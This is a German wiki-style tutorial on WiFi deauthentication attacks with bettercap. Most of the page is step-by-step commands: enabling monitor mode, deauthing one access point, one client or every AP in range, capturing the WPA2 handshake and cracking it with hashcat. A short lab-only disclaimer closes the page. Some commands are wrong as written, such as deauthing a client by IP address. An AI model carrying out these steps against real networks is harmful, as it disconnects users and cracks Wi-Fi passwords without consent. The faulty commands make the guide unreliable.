WiFi Deauth mit bettercap
Zur Navigation springen
Zur Suche springen
WiFi Deauth mit bettercap
Eine WiFi Deauthentication Attacke trennt Clients von ihrem Access Point. bettercap sendet gefälschte Deauth-Pakete im Namen des APs. Nebeneffekt: Beim erneuten Verbinden kann der WPA2-Handshake mitgeschnitten werden.
Umgebung
KALI = Angreifer (WLAN-Adapter mit Monitor-Modus) ZIEL-AP = 78:8c:b5:2a:5b:b4 (MAC des Access Points) OPFER = 192.168.16.131 (optional - gezielter Angriff)
Voraussetzung
- WLAN-Adapter muss Monitor-Modus unterstützen
iwconfig
- Monitor-Modus aktivieren
sudo ip link set wlan0 down sudo iwconfig wlan0 mode monitor sudo ip link set wlan0 up
- Prüfen
iwconfig wlan0 wlan0 Mode:Monitor ...
Angreifer - bettercap starten
sudo bettercap -iface wlan0
In der bettercap-Konsole
- WiFi Reconnaissance starten
wifi.recon on
- Access Points anzeigen
wifi.show
- Nur einen bestimmten Kanal scannen
wifi.recon.channel 6
- Handshake-Datei festlegen
set wifi.handshakes.file ./handshake.pcap
Deauth Angriff
- Alle Clients eines APs deauthentifizieren
wifi.deauth 78:8c:b5:2a:5b:b4
- Einzelnen Client deauthentifizieren
wifi.deauth 192.168.16.131
- Alle APs in Reichweite (nicht empfohlen)
wifi.deauth ff:ff:ff:ff:ff:ff
Handshake mitschneiden
- Nach dem Deauth verbindet sich der Client erneut
- bettercap speichert den WPA2-Handshake automatisch
ls -la ./handshake.pcap
- Handshake mit hashcat cracken
hashcat -m 22000 handshake.pcap wordlist.txt
Optionen wifi
- Hilfe anzeigen
help wifi
- wifi.handshakes.file → Speicherort für Handshakes (default=)
- wifi.recon.channel → Kanal einschränken
- wifi.skip.broken → Beschädigte Pakete überspringen
Hinweis
- Nur im eigenen Labor oder mit ausdrücklicher Genehmigung
- Monitor-Modus wird nicht von allen WLAN-Adaptern unterstützt
- Empfohlene Adapter für Kali: Alfa AWUS036ACH, Alfa AWUS036NH
- In VirtualBox: USB WLAN-Adapter durchreichen